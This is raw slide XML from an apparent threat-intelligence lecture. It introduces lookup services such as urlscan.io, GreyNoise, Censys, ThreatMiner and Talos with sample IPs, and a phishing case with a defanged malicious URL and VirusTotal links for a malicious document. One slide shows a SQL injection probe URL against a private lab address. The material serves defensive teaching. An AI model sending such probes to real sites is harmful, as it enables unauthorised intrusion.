            <a:ext cx="9113871" cy="4762861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2375479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5365-E948-2744-BF6F-7509AB4A6832}"/>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9690C147-C020-9E4C-9BE3-AC961E5C4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5" y="274638"/>
            <a:ext cx="8810641" cy="6415088"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213597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9587-8FE0-B121-310E-2171FA2CE584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlscan.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407B353E-1571-1E9A-ABD3-8D6D2760DCF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1167713"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample report: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://urlscan.io/result/acbf65ce-3d4b-43d1-86ad-414264a3ff40/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EC810F-DD5F-AADE-86EC-ED530D7BB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9272"/>
            <a:ext cx="9144000" cy="4968728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36083885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0A64-9C50-6A7F-066C-A206AB678360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlscan.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FEB11CB-7F6D-A4BE-EBBC-61E765837BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>umd-edu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://urlscan.io/result/3ba81f2c-530e-4308-9a83-e675bbeba38c/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3883484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C0E5-16AA-0F5C-E744-BE6EE6E71382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grey Noise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24D50B3D-78E5-09CF-E7D8-2B3E53F15C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.greynoise.io/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collects passive scan data from all over the world + data enrichment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.greynoise.io/viz/ip/45.155.205.233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (May be invalid now)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.greynoise.io/viz/query/?gnql=tags%3A%22Mirai%22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tag:Mirai</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDAA894C-1844-D9D9-0A6E-8CA4A1B13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995" y="19955"/>
            <a:ext cx="4399005" cy="2325911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29083043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24A1-7D23-4635-F732-9D0145340E4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grey Noise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F50F008-851C-7682-723B-AF56F583ED02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.greynoise.io/viz/ip/65.203.110.114</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED4ADFA-0813-60EE-22C3-419E520B4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34798"/>
            <a:ext cx="9144000" cy="4439626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3009520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159-8589-EA90-2254-98AE946E9D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Censys.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8780B496-DA58-B781-A837-61EE6BA83826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3818238" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://search.censys.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://search.censys.io/hosts/185.157.160.214</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (sample)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABFC191-B571-AB04-0E15-9AB29CA2B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289" y="0"/>
            <a:ext cx="4709711" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3962325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6364-9CE9-262E-8ED4-B9D148DDD412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Miner	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963B3738-214E-27E8-6974-00822C0BAA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://threatminer.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GeoIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, WHOIS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>APTNotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Passive DNS, Associated URLs, SSL Certs, network infrastructure, malware samples, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And a LOT OF ADS… (the price of a ‘free’ service…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14725789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0CF3-B80E-0947-87B9-C5129EEFEAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SenderBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F3DED7-834A-074F-92B9-21CFF06FB96B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1885949"/>
            <a:ext cx="5243514" cy="4972051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.talosintelligence.com/reputation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.talosintelligence.com/reputation_center/lookup?search=37.48.104.197</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Great way to learn more about spam/malware coming from specific IP addresses in the case of “why was my mail blocked?”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06578023-5BB6-C244-9933-164ECC009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513" y="0"/>
            <a:ext cx="3900487" cy="5103530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="976119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Play: SQL injection review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>://192.168.2.130/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>movies.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>=1%27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786062"/>
            <a:ext cx="8328254" cy="2643187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904123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F726-5B76-BF4C-A2C1-C19590064A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real Life Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960B1679-1554-1340-83BB-36315676E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02775"/>
            <a:ext cx="9149641" cy="1297550"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E33837-867A-6741-B95B-4B8076D48F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875" y="2771775"/>
            <a:ext cx="8401050" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>hxxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> ://  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>swehelp.nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> / Invoice-receipt/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413A4EA6-E89D-E641-84A5-3FA91E8AB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 y="3589556"/>
            <a:ext cx="5342294" cy="2969145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702059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BAD4-45D3-E541-8A16-CD9CF182EFE3}"/>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DCB14EC-06C9-2441-ACF7-CFB8924B0CA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="128588"/>
            <a:ext cx="7620000" cy="6272212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>swehelp.nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/#/domain/swehelp.nu</a:t>
            </a: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20FCB85F-F89F-0D4A-896A-BBF7EF1D9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3688"/>
            <a:ext cx="9144000" cy="4320886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2980234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7526-3B31-F04D-88D0-0A74B6F5FFB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EEAC0ED-90EE-394D-A1FE-75112E16530B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>swehelp.nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Invoice-receipt/ - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/#/url/846e94b2148e66aedcf0dc43544c9ee35414f2b7e7b39a687bab15b11f964809/detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633DDEFA-8DAD-6349-BB90-9238A8A06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638"/>
            <a:ext cx="9144000" cy="5149836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13454270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A0F7-C73A-F74E-97CB-3B50033BD3F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D9A7244-43F6-BB4E-A648-2026A447B24C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overdue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>payment.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/#/file/bfee8973fbd4f354790a29fddf3e2e8af990914811ede9282a36d994e23ba94f/detection</a:t>
